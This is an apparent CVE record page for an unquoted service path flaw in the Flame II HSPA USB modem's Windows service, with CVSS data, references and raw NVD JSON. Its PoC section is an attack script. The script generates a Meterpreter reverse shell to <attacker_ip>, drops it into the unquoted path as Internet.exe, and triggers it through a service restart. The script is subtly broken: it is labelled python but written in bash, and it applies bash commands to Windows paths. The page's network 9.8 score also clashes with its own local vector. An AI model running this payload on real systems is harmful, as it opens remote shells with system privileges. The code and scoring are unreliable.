CVE-2022-50935

Description

Flame II HSPA USB Modem contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Internet Telcel\ApplicationController.exe' to execute arbitrary code with elevated system privileges.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Flame II HSPA USB Modem (Alcatel X602A) - 所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2022-50935 PoC - Unquoted Service Path Exploitation
# Target: Flame II HSPA USB Modem (Alcatel X602A)
# Service: ApplicationController.exe

TARGET_PATH="C:\\Program Files (x86)\\Internet Telcel\\ApplicationController.exe"
MALICIOUS_EXE="C:\\Program Files (x86)\\Internet Telcel\\Internet.exe"
PAYLOAD="msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe > Internet.exe"

echo "[+] CVE-2022-50935 Unquoted Service Path Exploit"
echo "[+] Target: $TARGET_PATH"

# Step 1: Generate malicious payload
echo "[+] Generating payload..."
eval $PAYLOAD

# Step 2: Copy malicious executable to intermediate path
echo "[+] Placing malicious executable at unquoted path..."
cp Internet.exe "$MALICIOUS_EXE"

# Step 3: Wait for service restart or trigger manually
echo "[+] Waiting for service restart..."
echo "[+] Trigger service restart with: sc stop <service_name> && sc start <service_name>"
echo "[+] Or wait for system reboot"

# Step 4: Start Metasploit listener
echo "[+] Start listener: use exploit/multi/handler"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50935
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50935
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50935/
[4] VulDB https://vuldb.com/cve/CVE-2022-50935
[5] https://web.archive.org/web/20160402093509/https://www.telcel.com/personas/equipos/modems-usb/alcatel/x602a
[6] https://www.exploit-db.com/exploits/50708
[7] https://www.vulncheck.com/advisories/flame-ii-modem-usb-unquoted-service-path

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50935", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:58.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flame II HSPA USB Modem contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path in 'C:\\Program Files (x86)\\Internet Telcel\\ApplicationController.exe' to execute arbitrary code with elevated system privileges."}, {"lang": "es", "value": "El módem USB Flame II HSPA Flame II contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio de Windows. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files (x86)\\Internet Telcel\\ApplicationController.exe' para ejecutar código arbitrario con privilegios de sistema elevados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://web.archive.org/web/20160402093509/https://www.telcel.com/personas/equipos/modems-usb/alcatel/x602a", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50708", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/flame-ii-modem-usb-unquoted-service-path", "source": "[email protected]"}]}}